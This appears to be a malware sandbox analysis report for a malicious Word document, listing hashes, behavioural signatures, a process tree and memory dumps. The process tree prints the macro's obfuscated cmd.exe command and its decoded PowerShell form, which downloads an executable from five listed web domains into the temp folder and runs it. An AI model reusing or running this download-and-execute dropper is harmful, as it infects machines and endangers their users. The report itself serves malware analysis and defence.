Overview

overview

10

Static

static

8

088e0aa1d8...18.doc

windows7-x64

10

088e0aa1d8...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    30-04-2024 00:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    088e0aa1d899cc55046dcd2f1ae592a3_JaffaCakes118.doc

  • Size

    138KB

  • MD5

    088e0aa1d899cc55046dcd2f1ae592a3

  • SHA1

    b40b2f3cb411e37f55d101d9019a50666160ff7b

  • SHA256

    302d111df88971a8852fad6dcfc4463c0ee7cbddd465ac127c0702c59d2757cb

  • SHA512

    f60bf916c05b45be2f86a88571fa1d52ea0c4fd4170ccdaf1f26799280d2e14aa366c0e2e22a963f1485592cac3a5b5b662445c3239f6c65cddabe9380b9e644

  • SSDEEP

    1536:dP981ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadk+aRbPJl21X/lnnF:d18GhDS0o9zTGOZD6EbzCdw32NhF

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 5 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\088e0aa1d899cc55046dcd2f1ae592a3_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1284
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2992
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /V:/C"set D5=;'AJA'=YGu$}}{hctac}};kaerb;'iQM'=lbj$;XMC$ metI-ekovnI{ )00008 eg- htgnel.)XMC$ metI-teG(( fI;'utr'=qYO$;)XMC$ ,vYq$(eliFdaolnwoD.ihP${yrt{)sQD$ ni vYq$(hcaerof;'exe.'+wSw$+'\'+pmet:vne$=XMC$;'OVL'=IZY$;'865' = wSw$;'TBZ'=jSP$;)'@'(tilpS.'FXXm1xSO/moc.oidutssdnimlacigam//:ptth@k98SL52Oqg/moc.stnapyknufcm//:ptth@lE9pfhVr/moc.namllimleahcim//:ptth@iqRsEeZTG/moc.zyobeniram//:ptth@pFksMeQWB/moc.dleifekaweram//:ptth'=sQD$;tneilCbeW.teN tcejbo-wen=ihP$;'HVk'=wiw$ llehsrewop&&for /L %b in (472,-1,0)do set uw=!uw!!D5:~%b,1!&&if %b equ 0 echo !uw:~-473! |FOR /F "tokens=12 delims=\n.D5" %5 IN ('ftype^^^|findstr Cons')DO %5 -"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2556
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo powershell $wiw='kVH';$Phi=new-object Net.WebClient;$DQs='http://marewakefield.com/BWQeMskFp@http://marineboyz.com/GTZeEsRqi@http://michaelmillman.com/rVhfp9El@http://mcfunkypants.com/gqO25LS89k@http://magicalmindsstudio.com/OSx1mXXF'.Split('@');$PSj='ZBT';$wSw = '568';$YZI='LVO';$CMX=$env:temp+'\'+$wSw+'.exe';foreach($qYv in $DQs){try{$Phi.DownloadFile($qYv, $CMX);$OYq='rtu';If ((Get-Item $CMX).length -ge 80000) {Invoke-Item $CMX;$jbl='MQi';break;}}catch{}}$uGY='AJA'; "
          3⤵
            PID:2444
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=12 delims=\n.D5" %5 IN ('ftype^|findstr Cons') DO %5 -"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2468
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ftype|findstr Cons
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2488
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" ftype"
                5⤵
                  PID:2500
                • C:\Windows\SysWOW64\findstr.exe
                  findstr Cons
                  5⤵
                    PID:2236
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2852
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" =kVH
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:860

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
            Filesize

            20KB

            MD5

            0dd67614d86cfa1dab9c2be3261426dc

            SHA1

            3add846df66fe6ce06c46cfe4b6dd549a7e6d14b

            SHA256

            1dbf34343cf4ee9adb7a9a7385420630711a1912b94fe3e6ad8f004edc07bfca

            SHA512

            2710a907e90fd19d583b1de36cb630641136357e609fc4cdb2f8007f21e2dc9edd040acc7eece14dd78e8b9eb107171e726a467031c0d101e618caae1da69cec

            Download Submit
          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
            Filesize

            7KB

            MD5

            2b8ed63395b1c2cd7ecd835da2ae2ee2

            SHA1

            44fd9947d1187545fa18685e02f471d96d4fddbc

            SHA256

            d768ef3b135a460ee05437dbb99d372f18f698231a06f49d3c71bf5574eeff7c

            SHA512

            cc2a713af2cc20632ceb184947d6de31bf2a63192381bf2e89d2ed3d5a35acdec7668740a4364f100eeda643f562ba983d26a308f32c11371a8b050c88b96a51

            Download Submit
          • memory/1284-2-0x0000000070BCD000-0x0000000070BD8000-memory.dmp
            Filesize

            44KB

            Download
          • memory/1284-6-0x00000000004B0000-0x00000000005B0000-memory.dmp
            Filesize

            1024KB

            Download
          • memory/1284-7-0x00000000004B0000-0x00000000005B0000-memory.dmp
            Filesize

            1024KB

            Download
          • memory/1284-8-0x00000000004B0000-0x00000000005B0000-memory.dmp
            Filesize

            1024KB

            Download
          • memory/1284-0-0x000000002F7E1000-0x000000002F7E2000-memory.dmp
            Filesize

            4KB

            Download
          • memory/1284-21-0x0000000070BCD000-0x0000000070BD8000-memory.dmp
            Filesize

            44KB

            Download
          • memory/1284-22-0x00000000004B0000-0x00000000005B0000-memory.dmp
            Filesize

            1024KB

            Download
          • memory/1284-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
            Filesize

            64KB

            Download
          • memory/1284-38-0x000000005FFF0000-0x0000000060000000-memory.dmp
            Filesize

            64KB

            Download
          • memory/1284-39-0x0000000070BCD000-0x0000000070BD8000-memory.dmp
            Filesize

            44KB

            Download
          • memory/1284-40-0x00000000004B0000-0x00000000005B0000-memory.dmp
            Filesize

            1024KB

            Download